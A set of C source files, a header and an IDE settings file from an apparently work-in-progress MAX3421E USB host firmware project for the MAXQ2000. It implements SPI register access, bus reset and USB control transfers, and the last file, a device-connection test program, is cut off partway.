context.Repo.GenerateExceptionOnDeleteWhen(id => data.Id == id, HttpStatusCode.ExpectationFailed);
await context.Repo.ReplaceAsync(tmp);
subResult = await context.Repo.DeleteDocumentAsync(tmp).ContinueWith(CaptureResult);
}
subResult.Exception.Should().NotBeNull();
var aggException = subResult.Exception as AggregateException;
aggException.Should().NotBeNull();
aggException.InnerExceptions.Should().HaveCount(1);
var exception = aggException.InnerExceptions[0] as DocumentClientException;
exception.Should().NotBeNull();
exception.StatusCode.Should().Be(HttpStatusCode.ExpectationFailed);
}
[TestMethod]
public async Task DeleteItemByInstanceWithError()
{
var data = new TestData<Guid>
{
Id = Guid.NewGuid(),
Data = "My Data"
};
(Exception Exception, bool) subResult;
using (var context = CreateSubstituteContext())
{
var tmp = await context.Repo.AddAsync(data);
context.Repo.GenerateExceptionOnDeleteWhen(inst => data.Id == inst.Id, HttpStatusCode.ExpectationFailed);
await context.Repo.ReplaceAsync(tmp);
subResult = await context.Repo.DeleteDocumentAsync(tmp).ContinueWith(CaptureResult);
}
subResult.Exception.Should().NotBeNull();
var aggException = subResult.Exception as AggregateException;
aggException.Should().NotBeNull();
aggException.InnerExceptions.Should().HaveCount(1);
var exception = aggException.InnerExceptions[0] as DocumentClientException;
exception.Should().NotBeNull();
exception.StatusCode.Should().Be(HttpStatusCode.ExpectationFailed);
}
[TestMethod]
public async Task UpsertItemWithETagChange()
{
var data = new TestData<Guid>
{
Id = Guid.NewGuid(),
Data = "My Data"
};
(Exception Exception, TestData<Guid> Result) repoResult;
using (var context = CreateContext())
{
var tmp = await context.Repo.AddAsync(data);
await context.Repo.UpsertAsync(tmp);
repoResult = await context.Repo.UpsertAsync(tmp).ContinueWith(CaptureResult);
}
(Exception Exception, TestData<Guid>) subResult;
using (var context = CreateSubstituteContext())
{
var tmp = await context.Repo.AddAsync(data);
await context.Repo.UpsertAsync(tmp);
subResult = await context.Repo.UpsertAsync(tmp).ContinueWith(CaptureResult);
}
repoResult.Should().BeEquivalentTo(subResult, opt => opt.Excluding(su =>
Regex.IsMatch(su.SelectedMemberPath, "Item1.Message|Item1.InnerException")));
}
private (Exception Exception, T Result) CaptureResult<T>(Task<T> task)
{
switch (task.Status)
{
case TaskStatus.RanToCompletion:
return (default, task.Result);
case TaskStatus.Faulted:
return (task.Exception, default);
default:
throw new IndexOutOfRangeException($"task.Status '{task.Status}' is not handled");
}
}
}
}
<file_sep>using System;
using System.Linq;
using System.Linq.Expressions;
namespace CosmosDbRepository.Implementation
{
internal static class WhereExtension
{
public static IQueryable<TSource> ConditionalWhere<TSource>(this IQueryable<TSource> source, Expression<Func<TSource, bool>> predicate)
{
if (source is null)
{
throw new ArgumentNullException(nameof(source));
}
return (predicate != default)
? source.Where(predicate)
: source;
}
public static IQueryable<TSource> ConditionalApplyClauses<TSource>(this IQueryable<TSource> source, Func<IQueryable<TSource>, IQueryable<TSource>> clauses)
{
if (source is null)
{
throw new ArgumentNullException(nameof(source));
}
return (clauses != default)
? clauses.Invoke(source)
: source;
}
public static IQueryable<TResult> ApplyClauses<TSource, TResult>(this IQueryable<TSource> source, Func<IQueryable<TSource>, IQueryable<TResult>> clauses)
{
if (source is null)
{
throw new ArgumentNullException(nameof(source));
}
if (clauses is null)
{
throw new ArgumentNullException(nameof(clauses));
}
return clauses.Invoke(source);
}
}
}
<file_sep>using FluentAssertions;
using Microsoft.Azure.Documents;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
using System.Linq;
using System.Net;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest.StringId
{
[TestClass]
public class CosmosDbRepositoryReplaceTests
: CosmosDbRepositoryStringTests
{
[TestMethod]
public async Task Replace_Expect_Success()
{
using (var context = CreateContext())
{
var data = new TestData<string>
{
Id = GetNewId(),
Data = "Old Data"
};
data = await context.Repo.AddAsync(data);
data.Data = "New Data";
await context.Repo.ReplaceAsync(data);
}
}
[TestMethod]
public async Task Replace_Expect_PreconditionFailed()
{
using (var context = CreateContext())
{
var data = new TestData<string>
{
Id = GetNewId(),
Data = "Old Data"
};
data = await context.Repo.AddAsync(data);
await context.Repo.ReplaceAsync(data);
var faultedTask = context.Repo.ReplaceAsync(data);
await faultedTask.ShollowException();
faultedTask.IsFaulted.Should().BeTrue();
faultedTask.Exception.InnerExceptions.Should().HaveCount(1);
var dce = faultedTask.Exception.InnerExceptions.Single() as DocumentClientException;
dce.StatusCode.Should().Be(HttpStatusCode.PreconditionFailed);
}
}
}
}
<file_sep>using Newtonsoft.Json;
using Newtonsoft.Json.Converters;
using System;
namespace CosmosDbRepository.Sample
{
internal enum EpochUnits
{
Seconds,
Milliseconds
}
internal class EpochConverter
: DateTimeConverterBase
{
private static readonly DateTime _epoch = new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc);
private readonly EpochUnits _units;
public EpochConverter()
: this(EpochUnits.Seconds)
{
}
public EpochConverter(EpochUnits units)
{
_units = units;
}
public override void WriteJson(JsonWriter writer, object value, JsonSerializer serializer)
{
if (value != null)
{
switch (_units)
{
case EpochUnits.Seconds:
writer.WriteRawValue($"{(long)((DateTime)value - _epoch).TotalSeconds}");
break;
case EpochUnits.Milliseconds:
writer.WriteRawValue($"{(long)((DateTime)value - _epoch).TotalMilliseconds}");
break;
default:
throw new ArgumentException($"Unsupported value of {_units}", nameof(_units));
}
}
}
public override object ReadJson(JsonReader reader, Type objectType, object existingValue, JsonSerializer serializer)
{
object result;
if (reader.Value != null)
{
switch (_units)
{
case EpochUnits.Seconds:
result = _epoch.AddSeconds((long)reader.Value);
break;
case EpochUnits.Milliseconds:
result = _epoch.AddMilliseconds((long)reader.Value);
break;
default:
throw new ArgumentException($"Unsupported value of {_units}", nameof(_units));
}
}
else
{
result = null;
}
return result;
}
}
}<file_sep>using System;
using Newtonsoft.Json;
namespace CosmosDbRepository.Types
{
public class DocumentIdJsonConverter
: JsonConverter
{
public override bool CanConvert(Type objectType)
{
return objectType == typeof(DocumentId);
}
public override object ReadJson(JsonReader reader, Type objectType, object existingValue, JsonSerializer serializer)
{
if (reader.TokenType == JsonToken.Null)
return new DocumentId();
if (reader.TokenType != JsonToken.String)
throw new JsonSerializationException($"Unexpected token parsing date. Expected String, got {reader.TokenType}.");
var documentId = new DocumentId();
documentId = reader.Value.ToString();
return documentId;
}
public override void WriteJson(JsonWriter writer, object value, JsonSerializer serializer)
{
if (!(value is DocumentId documentId))
throw new JsonSerializationException($"Unexpected value when converting id. Expected DocumentId, got {value?.GetType().Name ?? "Null"}.");
writer.WriteValue(documentId.Id);
}
}
}<file_sep>using System.Collections.Generic;
namespace CosmosDbRepository.Types
{
public class CosmosDbRepositoryPagedResults<T>
{
public string ContinuationToken { get; set; }
public List<T> Items { get; set; } = new List<T>();
}
}<file_sep>using Newtonsoft.Json;
namespace CosmosDbRepository.Sample
{
public class PhoneNumber
{
[JsonProperty(PropertyName = "Number")]
public string Number { get; set; }
[JsonProperty(PropertyName = "type")]
public string Type { get; set; }
public override string ToString() => $"{Type}: {Number}";
}
} | df287513bafd10c94f81239d5d500166cf02aac8 | [
"Markdown",
"C#"
] | 52 | C# | trbenning/CosmosDbRepository | 5fe3b1199811e34bdfb9b462f0670c8304ee4d42 | c03bf44cdcf344c70158eca3c75f83d1bb436dc3 |
refs/heads/master | <repo_name>Abe-Tsang/exampleTrade<file_sep>/src/Driver.java
public class Driver {
public static void main(String[] args){
User buyer = new User("Abe");
User seller = new User("Tsang");
seller.postItem("Item1", 50, 2);
seller.postItem("Item2", 100, 3);
buyer.buyItem("Item2", 1);
System.out.println(seller.inventoryToString());
}
}
| 442d2b460f8d7c483202b969387765207873898a | [
"Java"
] | 1 | Java | Abe-Tsang/exampleTrade | fe5764ac5ab9f1409f736480a34e30e24563865b | 4497c5bc45aaec974d2ba65bc8ee0d6a3eb5b0e6 |
refs/heads/master | <repo_name>itqpleyva/abstractFactoryPattern<file_sep>/src/main/java/com/itqpleyva/abstractfactorypattern/UIClases/MacCheckbox.java
package com.itqpleyva.abstractfactorypattern.UIClases;
import com.itqpleyva.abstractfactorypattern.interfaces.Checkbox;
public class MacCheckbox implements Checkbox {
@Override
public void paint() {
System.out.println("I am a Mac Checkbox");
}
}<file_sep>/src/main/java/com/itqpleyva/abstractfactorypattern/AbstractFactoryPatternApplication.java
package com.itqpleyva.abstractfactorypattern;
import com.itqpleyva.abstractfactorypattern.Applications.Application;
import com.itqpleyva.abstractfactorypattern.factories.GuiFactory;
import com.itqpleyva.abstractfactorypattern.factories.MacFactory;
import com.itqpleyva.abstractfactorypattern.factories.WindowsFactory;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
@SpringBootApplication
public class AbstractFactoryPatternApplication {
static GuiFactory factory;
static Application app;
public static void main(final String[] args) {
SpringApplication.run(AbstractFactoryPatternApplication.class, args);
String os_name = System.getProperty("os.name").toLowerCase();
if (os_name.contains("mac")) {
factory = new MacFactory();
app = new Application(factory);
}
else{
factory = new WindowsFactory();
app = new Application(factory);
}
app.paint();
}
}
<file_sep>/src/main/java/com/itqpleyva/abstractfactorypattern/interfaces/Checkbox.java
package com.itqpleyva.abstractfactorypattern.interfaces;
public interface Checkbox {
void paint();
} | 938941185d9c4715f8754ec1a67d1285960bab6c | [
"Java"
] | 3 | Java | itqpleyva/abstractFactoryPattern | a1ca15d87cb51bede06e5109d0cc50194307394b | 9e1ac895718236ffce503ae2717e0097134ac935 |
refs/heads/master | <repo_name>JopperTom/MaxUSB<file_sep>/My Code/usb.h
#ifndef USB_H
#define USB_H
#define BUFSIZ 8
BYTE INTERRUPT;
int FLAG, FRAMECOUNT, CURRENT, NEXT;
BYTE errorcode;
BYTE HR1,HR2,HR3;
const SUD addr4 = {0x00,0x05,0x04,0x00,0x00,0x00,0x00,0x00};
const SUD conf1 = {0x00,0x09,0x01,0x00,0x00,0x00,0x00,0x00};
const SUD idle = {0x21,0x0A,0x00,0x00,0x00,0x00,0x00,0x00};
BYTE CTL_WRITE(void);
void Host_Init( void );
typedef struct {
BYTE bLength;
BYTE bDescriptorType;
BYTE bcdUSB[2];
BYTE bDeviceClass;
BYTE bDeviceSubClass;
BYTE bDeviceProtocol;
BYTE bMaxPacketSize;
BYTE idVendor[2];
BYTE idProduct[2];
BYTE bcdDevice[2];
BYTE iManufacture;
BYTE iProduct;
BYTE iSerialNumber;
BYTE bNumConfigurations;
} DEVICE_DESCR;
typedef struct {
BYTE bLength;
BYTE bDescriptorType;
BYTE wTotalLength[2];
BYTE bNumInterfaces;
BYTE bConfigurationValue;
BYTE iConfiguration;
BYTE bmAttributes;
BYTE bMaxPower;
} CONFIG_DESCR;
typedef struct {
BYTE bLength;
BYTE bDescriptorType;
BYTE bInterfaceNumber;
BYTE bAlternateSetting;
BYTE bNumEndpoints;
BYTE bInterfaceClass;
BYTE bInterfaceSubClass;
BYTE bInterfaceProtocol;
BYTE iInterface;
} INTERFACE_DESCR;
typedef struct {
BYTE bLength;
BYTE bDescriptorType;
BYTE bEndpoinAddress;
BYTE bmAttributes;
BYTE wMaxPacketSize;
BYTE bInterval;
} ENDPOINT_DESCR;
typedef struct {
SUD address;
SUD config;
SUD idle;
// DEVICE_DESCR device_descr;
// CONFIG_DESCR config_descr;
// INTERFACE_DESCR interface_descr;
// ENDPOINT_DESCR endpoint_1;
} DEVICE;
int Connect_Device( DEVICE * );
DEVICE *Open_Device( void );
void Close_Device( DEVICE *device );
void Configure_Device( DEVICE *device,
const SUD address,
const SUD config,
const SUD idle);
void Configure_Hub( DEVICE *device,
const SUD address,
const SUD config,
const SUD idle);
int host_send_data( unsigned char c, DEVICE *device );
int host_recv_data( DEVICE *device );
int FRAME = 0;
BYTE Check_INT(void);
void StallEP0(void);
void Bus_Reset(void);
void Bus_Resume(void);
void Reset_MAX(int);
BYTE Wait_for_HIRQ(BYTE regbit);
void Ack_Status(void);
BYTE readstat(void);
void wregAS16(BYTE reg,BYTE dat);
void std_request(void);
void class_request(void);
void vendor_request(void);
void send_descriptor(void);
// Host-specific
BYTE check_HRSL(void);
BYTE CTL_WRITE(void);
BYTE CTL_READ(void);
void waitframes(int num);
BYTE Set_Address(BYTE addr);
BYTE Get_Device_Status(void);
BYTE H_GetStat(BYTE port);
BYTE HubPort_Feature(BYTE setnotclr,BYTE feat,BYTE port);
BYTE Set_Idle(BYTE iface, BYTE duration, BYTE reportID);
BYTE Set_Config(BYTE cfgval);
BYTE Get_Descriptor(BYTE type,WORD length);
//void Get_Descriptor(BYTE, DEVICE*);
void Set_Descriptor(BYTE, DEVICE*);
//void Get_Descriptor(BYTE, DEVICE*);
void Get_Configuration( DEVICE* );
void Set_Configuration( DEVICE* );
//void Get_Interface( DEVICE* );
//void Set_Interface( DEVICE* );
// SPI_x.C prototypes
void set_addr(void);
void send_keystroke(BYTE);
void feature(BYTE);
void get_status(void);
void set_interface(void);
void get_interface(void);
void set_configuration(void);
void get_configuration(void);
BYTE H_D_GetStat(void);
#endif
<file_sep>/My Code/settings/RT53_Test_Bench.ini
[WorkspaceWindow]
ExpandedNodes=_ 10 "<ws>" "connect_test" "connect_test/connect_test.c" "connect_test2" "foo" "hst_LS_KBD_NOHUB" "hst_LS_KBD_NOHUB/hst_LS_KBD_NOHUB.c" "read_bytes" "simple_test" "simple_test2" 8 "simple_test/Debug" "connect_test/Debug" "read_bytes/Debug" "connect_test2/Debug" "hst_LS_KBD_NOHUB/Debug" "hst_LS_HUB_KBD/Debug" "foo/Debug" "simple_test2/Debug" "<ws>/hst_LS_HUB_KBD"
SelectedTab=_ 1
[Desktop-Workspace]
Wnd0=_ "TextEditor" "open" 44 0 2 160 882 -1 -1 1280 4 2372 913 "H:\maxim-ic\Maxim USB\My Code\usb.c" 1 1 0 0 6375 6375
Wnd1=_ "TextEditor" "open" 44 0 2 480 858 -1 -1 1354 30 2208 885 "H:\maxim-ic\Maxim USB\My Code\interface.c" 1 1 0 154 5280 5280
Wnd2=_ "TextEditor" "open" 44 0 2 0 882 -1 -1 11 21 617 557 "H:\maxim-ic\Maxim USB\My Code\usb.h" 1 1 0 67 2240 2240
Wnd3=_ "Messages2" "open" 44 0 1 -1 -1 -4 -30 0 700 1264 877 5 "Build\Messages" 1193 "Find in Files\Line" 59 "Find in Files\Path" 357 "Find in Files\String" 715 "Tool Output\Output" 1176
Wnd4=_ "Workspace2" "open" 44 0 1 -1 -1 -4 -30 0 0 352 608 276 27 27
Maximized=_ 0
Count=_ 5
<file_sep>/My Code/Copy of usb.c
#ifndef USB_C
#define USB_C
#include <intrinsics.h> // MAXQ2000 specific stuff
#include <iomaxq200x.h> // ditto
#include "..\usb.h"
#include "..\interface.c"
#include "RT53reg.h"
void Bus_Reset(void)
{
wreg(rHIEN,bmBUSEVENTIE); // enable the reset done irq
wreg(rHCTL,bmBUSRST); // initiate the 50 msec bus reset
Wait_for_HIRQ(bmBUSEVENTIRQ); // wait for, and then clear this interrupt
wreg(rHIEN,0x00); // all ints disabled
}
//
void Bus_Resume(void)
{
wreg(rHIEN,bmBUSEVENTIE); // enable the reset done irq
wreg(rHCTL,bmBUSRSM); // initiate the 20 msec bus resume
Wait_for_HIRQ(bmBUSEVENTIRQ); // wait for, and then clear this interrupt
wreg(rHIEN,0x00); // all ints disabled
}
void Reset_MAX(int time) // applies to MAX3420E or MAX3421E
{
// int k;
wreg(rUSBCTL,0x20); // chip reset
timeDELAY(500); // a delay
wreg(rUSBCTL,0x00); // remove the reset
timeDELAY(2000); // a delay
}
//periph
BYTE Set_Address(BYTE addr)
{
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x05);
wreg(rSUDFIFO,addr);
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x00);
//
wreg(rPERADDR,0x00); // send to address 0
return CTL_WRITE(); // return its error code
}
//
// DEVICE: Get_Status
//
BYTE Get_Device_Status(void)
{
wreg(rSUDFIFO,0x80); // 10000000 OUT, STD REQ, to Device
wreg(rSUDFIFO,0x00); // 0 is Get_Status
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x02); // ask for two bytes
wreg(rSUDFIFO,0x00);
return CTL_READ();
}
//
// HUB: get hub/port status. If port=0, returns hub status.
// PeriphBytes[0] = StatusL
// PeriphBytes = StatusH
// PeriphBytes = PortChangeL. NOTE: PortChangeH is all zeros so we skip it.
//
// Returns the result code for the CTL-RD transfer (0=no errors)
BYTE H_GetStat(BYTE port)
{
wreg(rSUDFIFO,0xA3); // 10100011 IN, class, "other"
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,port);
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x04);
wreg(rSUDFIFO,0x00);
return CTL_READ();
}
// HUB: Set/Clear port Feature
BYTE HubPort_Feature(BYTE setnotclr,BYTE feat,BYTE port)
{
wreg(rSUDFIFO,0x23);
wreg(rSUDFIFO, setnotclr ? 0x03:0x01); // Set_Feature or Clear_Feature
wreg(rSUDFIFO,feat);
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,port); // wIndexL
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x00);
wreg(rSUDFIFO,0x00);
return CTL_WRITE();
}
// Set_Idle[8] = {0x21,0x0A,0x00,0x00,0x00,0x00,0x00,0x00};
BYTE Set_Idle(BYTE iface, BYTE duration, BYTE reportID)
{
wreg(rSUDFIFO,0x21); // bmRequestType=Output, class request, directed to interface
wreg(rSUDFIFO,0x0A); // SET_IDLE
wreg(rSUDFIFO,reportID);// wValueL
wreg(rSUDFIFO,duration);// wValueH
wreg(rSUDFIFO,0x00); // wIndexL
wreg(rSUDFIFO,iface); // wIndexH
wreg(rSUDFIFO,0x0); // wLengthL
wreg(rSUDFIFO,0x0); // wLengthH
return CTL_WRITE();
}
//
BYTE Set_Config(BYTE cfgval)
{
wreg(rSUDFIFO,0x00); // bmRequestType=Output, std request, directed to device
wreg(rSUDFIFO,0x09); // SET_CONFIG
wreg(rSUDFIFO,cfgval); // wValueL
wreg(rSUDFIFO,0x00); // wValueH
wreg(rSUDFIFO,0x00); // wIndexL
wreg(rSUDFIFO,0x00); // wIndexH
wreg(rSUDFIFO,0x0); // wLengthL
wreg(rSUDFIFO,0x0); // wLengthH
return CTL_WRITE();
}
//
BYTE Set_Interface(BYTE interface, BYTE altsetting)
{
wreg(rSUDFIFO,0x00); // bmRequestType=Output, std request, directed to device
wreg(rSUDFIFO,0x0B); // SET_CONFIG
wreg(rSUDFIFO,altsetting); // wValueL=alternate setting
wreg(rSUDFIFO,0x00); // wValueH=0
wreg(rSUDFIFO,interface); // wIndexL=Interface number
wreg(rSUDFIFO,0x00); // wIndexH
wreg(rSUDFIFO,0x0); // wLengthL
wreg(rSUDFIFO,0x0); // wLengthH
return CTL_WRITE();
}
// Get_Descriptor_Device[8] = {0x80,0x06,0x00,0x01,0x00,0x00,0x40,0x00};
BYTE Get_Descriptor(BYTE type,WORD length)
{
wreg(rSUDFIFO,0x80); // bmRequestType=Input, Std request, directed to device
wreg(rSUDFIFO,0x06); // GET_DESCRIPTOR
wreg(rSUDFIFO,0x00); // wValueL = descriptor index
wreg(rSUDFIFO,type); // wValueH = descriptor type
wreg(rSUDFIFO,0x00); // wIndexL
wreg(rSUDFIFO,0x00); // wIndexH
wreg(rSUDFIFO,MSB(length)); // wLengthL
wreg(rSUDFIFO,LSB(length)); // wLengthH
return CTL_READ();
}
#ifdef HST
//periph 15.1.3
// **** CONTROL-Write transfer with no OUT data stage. ****
// 0. Before calling this function, load the SUDFIFO with the 8 setup bytes, and PERADDR with the address.
// 1. This function sends a SETUP token to fnaddr, EP=0, then a DATA0 PID with the 8 setup bytes in SUDFIFO.
// If the transfer error code is nonzero, the function exits with the return value of 1x, where x
// is the RT53 error code.
// 2. If no error, sends an IN handshake to fnaddr, EP=0. By setting the IN and HS bits, the SIE
// automatically checks for the correct peripheral response--an empty DATA1 packet--and ACKS it.
// If the transfer error code is nonzero, the function exits with the return value of 2x, where x
// is the RT53 error code.
//
BYTE CTL_WRITE(void) // call with SUDFIDO loaded with 8 bytes and PERADDR=device address
{
static BYTE errorcode;
// Phase 1. Send the SETUP token and 8 setup bytes. Device should immediately ACK.
wreg(rHXFR,tokSETUP);
//errorcode = check_HRSL(); // check_HRSL() waits for any interrupt and returns host result code
//tt errorcode = Wait_for_HIRQ(bmHXFRDNIRQ);
//tt if (errorcode)
//tt return 0x10 + errorcode; // it's nonzero. The 0x10 indicates first xfr phase
// Phase 2. Send IN handshakes until we get the DATA1 PID (expect NAKS)
do
{
wreg(rHXFR,bmHS); // [*** was A0, now 80h]
// errorcode = check_HRSL();
errorcode = Wait_for_HIRQ(bmHXFRDNIRQ);
}
while (errorcode == hrNAK); // Try again if a NAK
if (errorcode)
return 0x20 + errorcode; // 0x20 indicates second xfr phase
return(0); // success
}
//periph 15.1.2
// **** CONTROL-Read transfer
// Before calling, load SUDFIFO with the command request.
// The function sends the SETUP packet, then an IN packet, then reads the IN data
// into the RCVFIFO.
// Returns 0x00 on success, or 0xXN where X is 0x80, 0x90, etc. & n is the 4-bit HRSL error code.
// On exit, the RCVBC reg indicates the byte count, and the IN data is in the RCVFIFO.
//
//
BYTE CTL_READ(void)
{
static BYTE dum, errorcode;
//BYTE dum,errorcode,xlen;
// 0. Load the SUDFIFO
//writebytes(rSUDFIFO,8,pSUD);
// 1. Send a SETUP token to addr 0, ep0, followed by a DATA0 PID and the 8 setup bytes in SUDFIFO
// Note that we don't need to initialize the DATA toggle value, the SIE always sends DATA0 for SETUPS.
//
wreg(rHIEN,bmHXFRDNIE); // enable the host transfer done interrupt
wreg(rHXFR,bmSETUP); // trigger the transfer--SIE takes care of both SETUP and DATA stages. EP=0.
errorcode = check_HRSL(); // check_HRSL() waits for HXFRDN IRQ and returns host result code
if (errorcode)
return (0x80+errorcode);
// 2. Send an IN token to addr0, ep0.
dum = rreg(rHIRQ); // 0x68 FRAME, CONN, SNDBAV
SETBIT(rHCTL,bmRCVTOG1); // expect a DATA1 packet
wreg(rHXFR,0x00); // IN token to fnaddr, EP0
errorcode = check_HRSL(); // check_HRSL() waits for any interrupt and returns host result code
if (errorcode)
return (0x90+errorcode);
// 3. Get the byte count, read EP0FIFO into PeriphBytes array
//dum = rreg(rHIRQ); // 0x6C +++ FRAME CONN SNDBAV RCVDAV
//xlen = rreg(rRCVBC); // get the byte count ??? ERROR xlen=0, not 8
//readbytes(rRCVFIFO,xlen ,PeriphBytes);
//SETBIT(rHIRQ,bmRCVDAVIRQ); // clear the IRQ (and rRCVBC register)
// 4.
wreg(rHXFR,(bmOUTNIN | bmHS)); // OUT packet as a handshake
errorcode = check_HRSL(); // check_HRSL() waits for any interrupt and returns host result code
if (errorcode)
return (0xA0+errorcode);
//
return (0); // no errors
}
/*
//
BYTE Wait_for_HIRQ(BYTE regbit)
{
static BYTE result;
wreg(rHIEN,regbit); // enable only one IRQ in the HIEN register
result = regbit;
while( FLAG <= 0 ); // hang until an irq
FLAG = 0;
// wreg(rHIRQ,regbit); // clear the irq
wreg(rHIEN,0x00); // all ints off
result = rreg(rHRSL); // get the completion code
return (result & 0x0F); // 4 LSB only
}
*/
/*
BYTE check_HRSL(void) // wait for the HXFRDN IRQ, then read and return the result
{
BYTE done;
done = 0;
wreg(rHIEN,bmHXFRDNIE); // enable only this interrupt
while(!done)
{
while( FLAG == 0 ) ; // hang until an irq
if(rreg(rHIRQ) & bmHXFRDNIRQ) // is it the HXFRDN IRQ?
{
wreg(rHIRQ,bmHXFRDNIRQ); // clear the irq
done = 1;
}
}
wreg(rHIEN,0x00); // disable all interrupts
return (rreg(rHRSL) & 0x0F); // 4 LSB of completion code
}
*/
// Purpose: To remain in a loop until the FRAMEIRQ decrements a global variable to zero.
void waitframes(int num)
{
// BYTE temp;
//// FLAG = 0;
//FRAMECOUNT = num;
// temp = rreg( rHIEN ); // retrieve currently active interrupts
wreg( rHIEN, bmFRAMEIE ); // enable all interrupt
// timeDELAY(500); // a delay
// while( FRAMECOUNT >= 0 ); // loop until zero
wreg( rHIEN, 0x00 ); // disable all interrupts
}
/*
#pragma vector = 1 // Module 1 Vector
__interrupt void interrupt_service_routine()
{
// Has INT12 been triggered?
if ( EIF1_bit.IE12 ) // IE12 EIF1.4
{
// Loop while a valid interrupts exists
if( INTERRUPT = (rreg( rHIRQ ) & 0xF7) )
{
// Check which host interrupt
if ( INTERRUPT & bmBUSEVENTIRQ ) // [bus reset + 50mSec] or [bus resume + 20mSec]
{
FLAG = bmBUSEVENTIRQ;
wreg( rHIRQ, bmBUSEVENTIRQ); // clear this irq
}
else if ( INTERRUPT & bmRSMREQDETIRQ ) // Bus Resume Request Detected
{
FLAG = bmRSMREQDETIRQ;
wreg( rHIRQ, bmRSMREQDETIRQ ); // clear this irq
}
else if ( INTERRUPT & bmRCVDAVIRQ ) // Receiver FIFO contains Data
{
FLAG = bmRCVDAVIRQ;
wreg( rHIRQ, bmRCVDAVIRQ ); // clear this irq
}
else if ( INTERRUPT & bmSUSPENDDNIRQ ) // Suspend generation Done
{
FLAG = bmSUSPENDDNIRQ;
wreg( rHIRQ, bmSUSPENDDNIRQ ); // clear this irq
}
else if ( INTERRUPT & bmCONNIRQ ) // State of Connection Changed
{
FLAG = bmCONNIRQ;
switch ( rreg(rHRSL) & bmKSTATUS & bmJSTATUS )
{
case 0x00 : // SE0 - EOP or disconnect
break;
case bmKSTATUS :
break;
case bmJSTATUS :
break;
default :
// error
break;
}
wreg( rHIRQ, bmCONNIRQ ); // clear this irq
}
else if ( INTERRUPT & bmFRAMEIRQ ) // begin SOF Packet
{
FRAMECOUNT--;
FLAG = 64;
wreg( rHIRQ, bmFRAMEIRQ ); // clear the IRQ
}
else if ( INTERRUPT & bmHXFRDNIRQ ) // Host Transfer Done
{
FLAG = bmHXFRDNIRQ;
wreg( rHIRQ, bmHXFRDNIRQ ); // clear this irq
}
else if ( INTERRUPT & bmSNDBAVIRQ ) // Send Buffer Available
{
// static BYTE dummy;
//FLAG = 8;
wreg( rHIRQ, bmSNDBAVIRQ ); // clear this irq
// dummy = rreg(rHIRQ);
// EIF1_bit.IE12 = 0;
}
else if ( 0x00 ) // No valid interrupt
{
FLAG = -1;
// Reset the uProc interrupt
//EIF1_bit.IE12 = 0;
// Exit the ISR
// return;
}
} // if(INTERRUPT)
EIF1_bit.IE12 = 0;
} // end if( EIF1_bit.IE12 )
} // end ISR
*/
#endif // HOST
#endif
<file_sep>/My Code/connect_test2/a1/connect_test.c
//
// File........: simple_test.c
// Authors.....:
// Description.:
//
//
// Conditions:
// IFACE: SPI
//
// Date........:
//
// The proper interface can be found in interface.c
#ifndef simple_test_C
#define simple_test_C
// Host or peripheral? - define only one.
#define HST
//#define PER
// Low or Full Speed? - define only one.
//#define HS
#define LS
// Which interface? - define only one.
#define IFACE_SPI
//#define IFACE_I2C
#define TEMP
#include <stdlib.h>
#include <stdio.h>
#include <intrinsics.h> // MAXQ2000 specific stuff
#include <iomaxq200x.h> // MAXQ2000 specific stuff
#include "RT53reg.h" // RT99 Registers and bits
#include "..\interface.c" // SPI/I2C Implementation
#include "..\usb.c" // USB Implementation
///// Declare GLOBALS Here ///////////////////////
int CONNECT = -1;
//int host_send_data( unsigned char c, DEVICE *device );
//int host_recv_data( DEVICE *device );
// This will be an array of configured devices
// to accomodate one hub and one connected device
// DEVICE *this_device = NULL;
// this_device = malloc( sizeof( DEVICE ));
// if ( this_device == NULL) exit( 1 );
// prototypes in this module
int ConnectStatus( void );
void Read_Keypad(void);
//********************
///////////////////////////////////////////////////
main()
{
///// Declare Variables Here ///////////////////////
//
//// static BYTE dum, result, dum1;
static DEVICE *my_device = NULL;
///////////////////////////////////////////////////
Host_Init();
///// Your Code Here //////////////////////////////
wreg(rHCTL,0x04); // Sample the USB bus
CURRENT = -1;
NEXT = (rreg(rHRSL) & 0xC0);
timeDELAY(500); // a delay
while(1)
{
// Wait for a device to connect
/* switch( Connect_Device( this_device ) )
{
case 1: // Configure LS Peripheral and drop out to Read_Keypad()
// HOST_LS
// Configure_Device( this_device[x], addr[2], conf1, idle );
//my_device++;
break;
case 2: // Configure FS Peripheral and drop out to Read_Keypad()
// HOST_FS
// Configure_Device( this_device[x], addr[4], conf1, idle );
//my_device++;
break;
case 3: // Configure Hub and go back to wait for device to connect
// HOST_FS
// my_hub = this_device[x];
// Configure_Hub( my_hub, addr[6], ... );
// x++;
break;
default: // No Device
//x = 0;
break;
} // end switch()
*/
if ( CURRENT != NEXT )
{
CURRENT = NEXT;
// wreg(rHIEN,0x00);
switch ( CURRENT )
{
case 0x00 : // SE0 - EOP or disconnect
// PO0 = 0xCC; // MAXQ:
// if ( my_device != NULL )
Close_Device( my_device );
// free(my_device);
// my_device = NULL;
// status = 0;
break;
case bmKSTATUS : // K STATE
// PO0 = 0xC0; // MAXQ:
///////////////////////////////////////////////////
my_device = Open_Device( addr4 );
if ( my_device == NULL )
{
printf( "Failed to create the device!\n" );
exit( 1 );
}
// this_device = my_device;
// Configure_Device( my_device, addr4, conf1, idle );
///////////////////////////////////////////////////
// status = 1;
break;
case bmJSTATUS : // J STATE
// PO0 = 0x0C; // MAXQ:
///////////////////////////////////////////////////
my_device = Open_Device( addr4 );
if ( my_device == NULL )
{
printf( "Failed to create the device!\n" );
exit( 1 );
}
// Configure_Device( my_device, addr4, conf1, idle );
// this_device = my_device;
///////////////////////////////////////////////////
// status = 2;
break;
default : // error
break;
} // end switch ( CURRENT )
